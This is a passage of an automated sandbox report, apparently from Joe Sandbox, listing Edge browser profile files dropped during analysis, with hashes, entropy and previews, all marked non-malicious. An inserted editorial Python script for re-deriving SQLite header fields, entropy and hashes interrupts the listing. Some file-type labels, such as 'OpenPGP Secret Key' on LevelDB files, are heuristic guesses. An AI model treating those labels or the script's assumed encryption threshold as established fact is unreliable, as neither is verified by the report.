                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..................n..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):40960
                                                                                                                                                            Entropy (8bit):0.466449324575039
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0YQCv:v7doKsKuKZKlZNmu46yjx0BCv
                                                                                                                                                            MD5:685581485950DFB1E5B783A4E760062F
                                                                                                                                                            SHA1:315AFB63CF48145B75CEEB73A732C456A14A8218
                                                                                                                                                            SHA-256:71DF05713C31AAE816F9EECFD0EBCEDF73E3E75FE6C34B919F7B30266A3D99B4
                                                                                                                                                            SHA-512:11F4FE81BE479259FB7A8A1A6929099A018EA5B007115E92D10FA8CB2CE39C4FF7E62722358A43B6B845758C5A9E91C15BC850D8F64F4BC1184C8C074021D3B9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
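The SQLite entries above carry three derived columns that are worth being able to reproduce when triaging a dropped file obtained from the sandbox: the File Type line (the 100-byte SQLite header rendered in file(1) style, as in "last written using SQLite version 3042000, page size 2048, file counter 5, ..."), the 8-bit Entropy, and the MD5/SHA1/SHA-256/SHA-512 digests. The script below is an added example, not part of this report and not Joe Sandbox's own code. It parses the header fields, formats them the way the entries above do (zero-valued counters omitted and a 4096-byte page size left implicit, two rules inferred from the entries in this report), computes entropy and hashes, and cross-checks header page count times page size against the on-disk size. The entropy threshold for the Encrypted flag is an assumption (the report does not state how that column is derived), and the sample database it analyzes is constructed in a temporary directory rather than taken from the sandbox.

```python
# Added example, not from the report above or from Joe Sandbox: re-derive the
# per-file fields of a 'Dropped Files' entry from the file itself.
import hashlib
import math
import sqlite3
import struct
import tempfile
from collections import Counter
from pathlib import Path

SQLITE_MAGIC = b"SQLite format 3\x00"
TEXT_ENCODINGS = {1: "UTF-8", 2: "UTF-16 little endian", 3: "UTF-16 big endian"}
HEADER_FIELDS = ("file_counter", "database_pages", "first_free_page",
                 "free_pages", "cookie", "schema")  # header words at offsets 24..47
# Assumption: the report does not say how 'Encrypted' is derived; flag above this.
ENCRYPTED_ENTROPY_THRESHOLD = 7.2


def parse_sqlite_header(data: bytes) -> dict:
    """Decode the big-endian fields of the 100-byte SQLite 3 file header."""
    if len(data) < 100 or data[:16] != SQLITE_MAGIC:
        raise ValueError("not an SQLite 3 database")
    h = dict(zip(HEADER_FIELDS, struct.unpack_from(">6I", data, 24)))
    page_size = struct.unpack_from(">H", data, 16)[0]
    h["page_size"] = 65536 if page_size == 1 else page_size  # 1 encodes 64 KiB
    enc = struct.unpack_from(">I", data, 56)[0]
    h["text_encoding"] = TEXT_ENCODINGS.get(enc, f"unknown({enc})")
    h["version_valid_for"], h["sqlite_version"] = struct.unpack_from(">2I", data, 92)
    return h

def format_file_type(h: dict) -> str:
    """Render the header like the report's 'File Type' column: zero counters
    omitted, 4096-byte page size implied (rules inferred from the entries above)."""
    parts = ["SQLite 3.x database"]
    if h["sqlite_version"]:
        parts.append(f"last written using SQLite version {h['sqlite_version']}")
    if h["page_size"] != 4096:
        parts.append(f"page size {h['page_size']}")
    labels = {"file_counter": "file counter", "database_pages": "database pages",
              "first_free_page": "1st free page", "free_pages": "free pages"}
    parts += [f"{label} {h[key]}" for key, label in labels.items() if h[key]]
    if h["cookie"]:
        parts.append(f"cookie {h['cookie']:#x}")
    if h["schema"]:
        parts.append(f"schema {h['schema']}")
    parts.append(h["text_encoding"])
    if h["version_valid_for"]:
        parts.append(f"version-valid-for {h['version_valid_for']}")
    return ", ".join(parts)

def build_sqlite_header(page_size=4096, text_encoding=1, schema=4,
                        version_valid_for=0, sqlite_version=0, **counters) -> bytes:
    """Constructed 100-byte header for exercising the parser (not a real file)."""
    hdr = bytearray(100)
    hdr[:16] = SQLITE_MAGIC
    struct.pack_into(">H", hdr, 16, 1 if page_size == 65536 else page_size)
    words = [counters.get(f, 0) for f in HEADER_FIELDS[:-1]] + [schema]
    struct.pack_into(">6I", hdr, 24, *words)
    struct.pack_into(">I", hdr, 56, text_encoding)
    struct.pack_into(">2I", hdr, 92, version_valid_for, sqlite_version)
    return bytes(hdr)

def shannon_entropy_8bit(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant file, 8.0 for uniformly random bytes."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def describe_dropped_file(path: Path) -> dict:
    """Hashes, entropy and, for SQLite files, the parsed header plus a size check."""
    data = path.read_bytes()
    ent = shannon_entropy_8bit(data)
    info = {"size": len(data), "entropy": ent,
            "encrypted_guess": ent > ENCRYPTED_ENTROPY_THRESHOLD}
    for name in ("md5", "sha1", "sha256", "sha512"):
        info[name] = hashlib.new(name, data).hexdigest().upper()
    if data[:16] == SQLITE_MAGIC:
        h = parse_sqlite_header(data)
        info["file_type"] = format_file_type(h)
        # Header page count times page size should equal the on-disk size.
        info["size_matches_header"] = h["page_size"] * h["database_pages"] == len(data)
    return info

def analyze_sample(page_size: int = 2048) -> dict:
    """Build a constructed Chromium-style database and describe it end to end."""
    with tempfile.TemporaryDirectory() as tmp:
        db = Path(tmp) / "Login Data"
        con = sqlite3.connect(str(db))
        con.execute(f"PRAGMA page_size = {page_size}")  # must precede the first write
        con.execute("CREATE TABLE logins (origin_url TEXT, username_value TEXT)")
        con.execute("INSERT INTO logins VALUES ('https://example.test', 'user')")
        con.commit()
        con.close()
        return describe_dropped_file(db)

if __name__ == "__main__":
    for key, value in analyze_sample().items():
        print(f"{key}: {value}")
```

Run against a real dropped file with describe_dropped_file(Path(...)) and compare the output with the entry in the report; a header whose page count does not match the file size, or an "Encrypted: false" entry with near-8.0 entropy, is what deserves a second look.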
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):11755
                                                                                                                                                            Entropy (8bit):5.190465908239046
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                            MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                            SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                            SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                            SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):115717
                                                                                                                                                            Entropy (8bit):5.183660917461099
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                            MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                            SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                            SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                            SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (18208), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):18210
                                                                                                                                                            Entropy (8bit):5.455732884107002
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:sVmoJ9pQTryZiuaba4uypnNJk3SewAYjY5pEwqi5WcHbbK8Gpj+FeJYQwHtvDdld:sV7LAJu4NJk3nu3yWeepUjQwVDx
                                                                                                                                                            MD5:C602501DC45B81AB88695A49C98CD6C5
                                                                                                                                                            SHA1:0E73B87254B5142D23F3AD5E66777B311F99CF0E
                                                                                                                                                            SHA-256:0A398520872B8DD3845CCD0EB5DE641ABA8AE9507F2E944D4C4405A36CA8CFCB
                                                                                                                                                            SHA-512:5E2F24CFFB878C5AB145510F36F53051D2A716FD581C881386989A1C00E4C41D73F4B4942F6A81C1A2FA24AA6C9160F9C870B42C571E07CA90D3ED036204893D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380674698994767","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
Category: dropped
Size (bytes): 28672
Entropy (8bit): 0.3410017321959524
Encrypted: false
SSDEEP: 12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
MD5: 98643AF1CA5C0FE03CE8C687189CE56B
SHA1: ECADBA79A364D72354C658FD6EA3D5CF938F686B
SHA-256: 4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
SHA-512: 68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
Malicious: false

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 16384
Entropy (8bit): 0.35226517389931394
Encrypted: false
SSDEEP: 12:TLC+waBg9LBgVDBgQjiZBgKuFtuQkMbmgcVAzO5kMCgGUg5OR:TLPdBgtBgJBgQjiZS53uQFE27MCgGZsR
MD5: D2CCDC36225684AAE8FA563AFEDB14E7
SHA1: 3759649035F23004A4C30A14C5F0B54191BEBF80
SHA-256: 080AEE864047C67CB1586A5BA5EDA007AFD18ECC2B702638287E386F159D7AEE
SHA-512: 1A915AF643D688CA68AEDC1FF26C407D960D18DFDE838B417C437D7ADAC7B91C906E782DCC414784E64287915BD1DE5BB6A282E59AA9FEB8C384B4D4BC5F70EC
Malicious: false

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: data
Category: dropped
Size (bytes): 32768
Entropy (8bit): 0.08726716274348083
Encrypted: false
SSDEEP: 12:btPtB2lQEtPtB2lXzFnnnnnnnnnnnpwE:pVB2isVB2Xnnnnnnnnnnnu
MD5: C6E3695A003980315433C420DBFC5162
SHA1: BD1C5C2585751DEB3602A8A3EE38E777ADEAE5B6
SHA-256: E64696785F84DA5A8FAE37DED1E90183FF6462A1FD133B1C69412079D51A2D45
SHA-512: 1C7EA31A789F4249C60C4CFAECD407F03011AB8E162C7D79B1DB719FA1195EAC29B76B2C57150B7FED1A3BF309E0AFB4148A1E418DA50C75CB1406EFF6854F5A
Malicious: false

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: SQLite Write-Ahead Log, version 3007000
Category: dropped
Size (bytes): 247232
Entropy (8bit): 0.8301648674805258
Encrypted: false
SSDEEP: 384:T7Y9zlLm2wXpitj5BPtI/B181QAv8zNy/y2nygyP9y3xyFQ:3/e7
MD5: CC34F2167C96705A30E123094D82721B
SHA1: 6B759EF875AA3512DA04A14F6ACF58E752D1F1FA
SHA-256: 50B93EB8E493BB316FC797FDF2F62164518066D45BEC309B498CE42A53AB3D26
SHA-512: BAD8510C2C8A0F472A1BADFA77573DB51B58C53474428A9FAD8F8F37A90139C716D736855B7A6CC8B84C1019E08E04029BDAE46DC8ABB016D69BF3AA5AF2993E
Malicious: false

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: ASCII text
Category: dropped
Size (bytes): 16
Entropy (8bit): 3.2743974703476995
Encrypted: false
SSDEEP: 3:1sjgWIV//Uv:1qIFUv
MD5: 46295CAC801E5D4857D09837238A6394
SHA1: 44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256: 0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512: 8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious: false
Preview: MANIFEST-000001.

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: data
Category: dropped
Size (bytes): 190
Entropy (8bit): 4.610513803063863
Encrypted: false
SSDEEP: 3:VVXntjQ28l/1r6P/FDdllhUHBFOR3tS/l3seGKT9rcQ6x88rOtlTxotl:/XnthC9illhUHBqil3sedhO88rOu
MD5: 3A981A6F2907F05813B06EC4BBA6137F
SHA1: 7CA3CEDA8BF9D1E2FB96B6C26D5170C3043FC3BB
SHA-256: 03E81BCAAC63F68B12BF51C2314ED518B067F6A72F5E9E332E240CCF7579A6ED
SHA-512: 6D15C9EE5C5BF88EED47CC32C6BF1680DA17F4A791BFBEE2ECD0EE602D722B03469911CC9CBCC7A59FB426F4C123DD231458849F6DD3FE51F5749BBB87A1104D
Malicious: false
Preview: A..r.................20_1_1...1.`e;...............#38_h.......6.Z..W.F.........................Q..0................39_config..........6.....n ...1u}.=...............u}.=...............

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: ASCII text
Category: dropped
Size (bytes): 16
Entropy (8bit): 3.2743974703476995
Encrypted: false
SSDEEP: 3:1sjgWIV//Uv:1qIFUv
MD5: 46295CAC801E5D4857D09837238A6394
SHA1: 44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256: 0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512: 8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious: false
Preview: MANIFEST-000001.

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: ASCII text
Category: dropped
Size (bytes): 281
Entropy (8bit): 5.251925750340289
Encrypted: false
SSDEEP: 6:iO/X1wkn23oH+Tcwtfrl2KLl9b+q2Pwkn23oH+TcwtfrK+IFUv:7/WfYeb1Lzb+vYfYeb23FUv
MD5: 1493066B15790A51FDA0AB2A19F857CA
SHA1: 6BF3470F331044C1F8257300D6F58EE6931E4C1C
SHA-256: 8324FBFAF57E41AEDB07A45FAA26ED25AD64DF37BA112B68CAE5203388F88188
SHA-512: B3E686B1B7FF49A7D4B81F62D145E9F1A5E12781C28C008707BBC11F2EF7057D8427BA315A4698FC41A3F3F247049441398A21F15D7A3AD1BB1A20F113B70DA1
Malicious: false
Preview: 2025/01/06-17:04:59.484 17dc Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db since it was missing..2025/01/06-17:04:59.499 17dc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: OpenPGP Secret Key
Category: dropped
Size (bytes): 41
Entropy (8bit): 4.704993772857998
Encrypted: false
SSDEEP: 3:scoBAIxQRDKIVjn:scoBY7jn
MD5: 5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1: D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256: F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512: DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious: false
Preview: .|.."....leveldb.BytewiseComparator......

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: ASCII text
Category: dropped
Size (bytes): 16
Entropy (8bit): 3.2743974703476995
Encrypted: false
SSDEEP: 3:1sjgWIV//Uv:1qIFUv
MD5: 46295CAC801E5D4857D09837238A6394
SHA1: 44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256: 0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512: 8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious: false
Preview: MANIFEST-000001.

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: data
Category: dropped
Size (bytes): 617
Entropy (8bit): 3.949047921959319
Encrypted: false
SSDEEP: 12:G0nYEQeeetU3p/Uz0RuWlJhC+lvBavRtin01zv0:G0nYEQR3RUovhC+lvBOL0
MD5: EE5B47D224FE27A05467689F5B0678FA
SHA1: 35341CA4CC493FFC4939EB3D7D8E178D7D5028F9
SHA-256: 779E99DFF510FCAA7E0BBE155D9C33ABE7D6B82EEB40B91097E0E54499F06211
SHA-512: CFD7F227195E51CC93DED600CDC5FDDD8689C924070F9F1E68CAD19EDB7937EACFBA00BA533A7592AA7664D749C756DA1A9A97EDD72EA6EF900782A968D944DE
Malicious: false
                                                                                                                                                            Preview:.h.6.................__global... .t...................__global... ..'i..................21_.....B....................33_......-.t.................21_......'..................33_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.....
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16
                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MANIFEST-000001.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):299
                                                                                                                                                            Entropy (8bit):5.174957765917191
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:iO/Xb1wkn23oH+Tcwtfrzs52KLl9adc+q2Pwkn23oH+TcwtfrzAdIFUv:7/X6fYebs9Lzadc+vYfYeb9FUv
                                                                                                                                                            MD5:8994746976A050B7CCC65F7250BF09C3
                                                                                                                                                            SHA1:19A2DCB576892224E16E3BF0427324BA024DB273
                                                                                                                                                            SHA-256:0EF25777AE113B81ABF6913B266A460DA7319F4F21051D425E21C9B82FE3342D
                                                                                                                                                            SHA-512:9A96D99AA66275779FAFE0C824BACAB75C8ABCB138B5ED1404E9004B8A04D9966A1715A55BF2A6B5EF499231B60C75141E1D9D5B4BF508A3A8E1F06BAB8A154B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:04:59.022 17dc Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata since it was missing..2025/01/06-17:04:59.071 17dc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):41
                                                                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.01057775872642915
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsFl:/F
                                                                                                                                                            MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                            SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                            SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                            SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):270336
                                                                                                                                                            Entropy (8bit):8.280239615765425E-4
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                            MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                            SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                            SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                            SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.011852361981932763
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsHlDll:/H
                                                                                                                                                            MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                            SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                            SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                            SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.012340643231932763
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsGl3ll:/y
                                                                                                                                                            MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                            SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                            SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                            SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):262512
                                                                                                                                                            Entropy (8bit):9.553120663130604E-4
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:LsNlL3/Sl:Ls3
                                                                                                                                                            MD5:C35AC8F0B79981E91ACAB3CE17C3AA63
                                                                                                                                                            SHA1:5B21EF473AA02D09947F0FA095C15857DFC5AAEA
                                                                                                                                                            SHA-256:677885E652561828FB52FFAFFCF865E772FAB957876CFC0CBB2090E476355873
